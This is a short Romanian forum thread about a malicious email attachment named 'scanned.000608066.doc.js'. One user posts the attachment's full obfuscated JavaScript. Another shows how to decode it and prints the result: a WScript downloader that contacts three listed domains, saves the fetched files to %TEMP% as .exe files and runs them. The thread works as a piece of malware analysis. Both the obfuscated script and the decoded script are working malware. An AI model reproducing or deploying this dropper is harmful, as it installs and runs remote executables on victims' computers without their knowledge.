un exploit javascript

[nardini]

var a9='555C535E060511240611080F17170A4A0A0509015E3C5E16010508171405070157004A060D1E5E17515E555051505C55535052555E55',d1='; i',p78='exe',w16='; ',p94='00) ',m91='ar ',j1='e(',z17='s ',y17=' { ',w80='if (',m42=' {',x23='ngs(',d74=',"',d23='ak',b19='n+".e',h21='Stri',z95='nt',e50=' { f',d59=' xa.w',n17='se); ',o74='or',f55='d=',j20='ver.c',i68='ter',t56='== 2',p68='rit',t60='ect(',u95=' i',w48='.Exp',w64='.fr',g15='or (',f16='e(xo.',v87='va',m76='o.ope',u66='re',b45=' xa.',m82='.com',v92='n(); ',r77='one',n97=' xa.c',o55=' va',z51=' ws',c22='{ xa',n38=' dn =',b15='gr',b16='coun',p98='; } ',e95='oFil',k28='; bre',l20='xa',n65='HTT',u96='23.',y28='r ',s13=') { l',l48='f (',l77='ele',i58=' ld',c53='el',s58='am',b78='Scr',p99='nd();',h91='eval',y92=' x',c83='n("G',d6='ser',f28='http',c60='} cat',r65='; tr',t96='om',z60='0;',k96='xa',b71=' { x',v63='".spl',f61='; var',i95='andEn',z96='bjec',u45='ate.c',f51='+n+',g79='2)',v6='los',e9='; va',v45='xo.se',x49='2)+"',i2=' = ',y30='az',p82='2.XML',j13='.size',w13='re',l27='t.Cre',z63=' "); ',y91='00)',w67='93',x46='= WS',x68='/?id=',k55='t("',s99='catch',t29='e()',r93=' ex',o76='xa ',y34='o = W',t44='=3; ',x41='; i<',g37='i=ld',c65='1785"',z58='tring',l15=' { ',g81='b.le',p12='l")',z30='1; n<',g83=' "ya',z23='+b[',b74=' (',w35='fn+',z88='un(fn',k78=' = W',w46='++)',l40='.co.',t47='har',g96=' = 1;',v11='rn',q54='.type',n49=v87+'r b ='+g83+'tr'+y30+r77+m82+r93+'qu'+'is'+'iteco'+'rpse'+l40+'nz.'+'s740'+u96+b15+'id'+d6+j20+'om m'+'ai'+'nes'+l77+'ctre'+'alest'+u45+t96+v63+'it'+'("'+z63+'var'+z51+k78+'Scri'+'pt.C'+'rea'+'te'+'Objec'+'t("W'+b78+'ipt.'+'Sh'+c53+p12+e9+'r '+'fn '+'= ws'+w48+i95+'vir'+'onme'+z95+h21+x23+'"%T'+'EM'+'P%'+'")+S'+z58+w64+'omC'+t47+'Code'+'(9'+x49+'30298'+'8"'+f61+y92+y34+'Scrip'+l27+'ateO'+z96+k55+'MS'+'XML'+p82+n65+'P");'+o55+y28+o76+x46+'crip'+'t.Cr'+'eateO'+'bj'+t60+'"ADO'+'DB.St'+w13+s58+'"); '+'var'+i58+i2+z60+' f'+g15+'va'+'r n='+z30+t44+'n++)'+e50+o74+' (v'+m91+g37+x41+g81+'ngth;'+u95+w46+l15+'var d'+'n = 0'+'; try'+b71+m76+c83+'ET"'+d74+f28+'://"'+z23+'i]+"/'+b16+i68+x68+'"+a'+'9+"&'+v11+f55+w67+c65+'+n,'+' fal'+n17+v45+p99+' if'+b74+'xo.s'+'tatu'+z17+t56+p94+c22+'.ope'+v92+l20+q54+g96+d59+p68+f16+u66+'spons'+'eBod'+'y)'+d1+l48+k96+j13+' >'+' 10'+y91+m42+n38+' 1; x'+'a.'+'posit'+'ion'+' = 0;'+b45+'saveT'+e95+j1+w35+b19+'xe",'+g79+r65+'y { '+'ws.R'+z88+f51+'".'+p78+'",1'+',0); '+c60+'ch '+'(er)'+y17+'}; };'+n97+v6+t29+'; }'+w16+w80+'dn '+'== 1'+s13+'d = i'+k28+d23+'; }'+p98+s99+' ('+'er) {'+' }; }'+'; }'+';';this[h91](n49);

primit sub forma de attash in email 

 

scanned.000608066.doc.js

[Nytro]

Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". E un apel de functie cu un anume parametru. Ce se intampla daca afisam acel parametru (n49)?

Adica inlocuim "this[h91]" cu "document.write" si:

 

var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };

PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7.

[nardini]

vad ca merge si pe mozila, run intr-un virtual.